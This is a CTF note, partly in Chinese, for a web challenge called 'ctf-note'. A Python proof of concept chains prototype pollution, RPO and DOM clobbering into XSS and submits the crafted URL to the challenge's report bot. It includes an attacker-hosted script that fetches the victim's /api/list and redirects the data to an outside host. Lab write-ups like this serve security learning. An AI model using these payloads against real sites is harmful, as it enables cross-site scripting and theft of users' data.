# CTF note

* site : http://ctf-note.splitline.tw:9527/login
* 感覺是 XSS 應該
* 助教解
    1. prototype pollution markdown.js --> XSS
    2. RPO attack --> make config.js 404
    3. DOM Clobbering --> create a nyanCat plugin yourself

```
#!/usr/bin/env python3
# PoC for the three-step chain listed above. Read top to bottom: one
# request per step, then a /report submission that hands the crafted URL
# to the challenge (presumably visited by its bot -- not shown here).
import requests
import secrets

base_url = "http://ctf-note.splitline.tw:9527"
# Attacker-hosted script. This PoC never fetches it itself; it is only
# referenced from the href inside the payload below.
xss_script = "http://lab.splitl.in:8000/xss.js"

# What xss_script serves (kept as a no-op string literal, not executed by
# this file): reads /api/list from the victim's session and redirects to
# the attacker host with the response appended as a query parameter.
"""
// xss.js
fetch('/api/list').then(r=>r.text())
.then(r=>location = "http://lab.splitl.in:8000/meow?c="+r)
"""

# Throwaway account: random credentials so the note is created under a
# fresh user. The session cookie set here is reused by every later call.
req = requests.session()
req.post(f"{base_url}/login", data={
    "username": secrets.token_urlsafe(32),
    "password": secrets.token_urlsafe(32),
})

# Steps 1 and 3: store a note whose second writeup carries the payload.
# The first writeup is ordinary content; only the second one matters.
res = req.post(f"{base_url}/api/add", json={
    "contestName": "PoC",
    "writeups": [
        {
            "category": "Web",
            "challenge": "xss",
            "content": "owo?"
        },
        {
            # Step 1 -- a "__proto__" category is the prototype pollution
            # hook (markdown.js attributes, per the TA's notes above).
            # Defensive takeaway: reject or skip `__proto__` keys when
            # merging user-supplied objects.
            "category": "__proto__",  # prototype pollution: markdown.js attributes
            # Step 3 -- DOM clobbering of `CONFIG.plugins.nyanCat`: the outer
            # iframe is named CONFIG, the inner one is named plugins, and the
            # anchor has id nyanCat, so that lookup resolves to the <a> whose
            # href is xss_script. Assumes the app reads plugin URLs from
            # CONFIG.plugins -- TODO confirm against the app source.
            "challenge": f""" ><iframe name=CONFIG srcdoc=" <iframe srcdoc='<a id=nyanCat href={xss_script}>test</a>' id=CONFIG name=plugins> "></iframe><""",
            "content": "whatever"
        }
    ]})
print(res.content)
# NOTE(review): no status check before .json(); a non-JSON error body
# (e.g. a login redirect) would raise ValueError here rather than a
# readable message.
res = res.json()

print("[+] session =", req.cookies['session'])

# Step 2 -- RPO: the encoded "..%2f" path segment is what the notes say makes
# config.js 404, presumably because the page loads config.js by a relative
# path; with the real CONFIG never defined, the clobbered one above is what
# the page sees (inference -- verify against the app). The fragment carries
# the uuid of the note just created, which the viewer page presumably reads.
malicious_url = f"{base_url}/meow/..%2f#{res['uuid']}"  # make `config.js` 404
print("[+] malicious url =", malicious_url)
# Hand the URL to the challenge's /report endpoint; the response body is
# printed as-is because its format is not documented on this page.
res = req.post(f"{base_url}/report", data={"url": malicious_url})
print(res.text)
```

###### tags: `unsolved`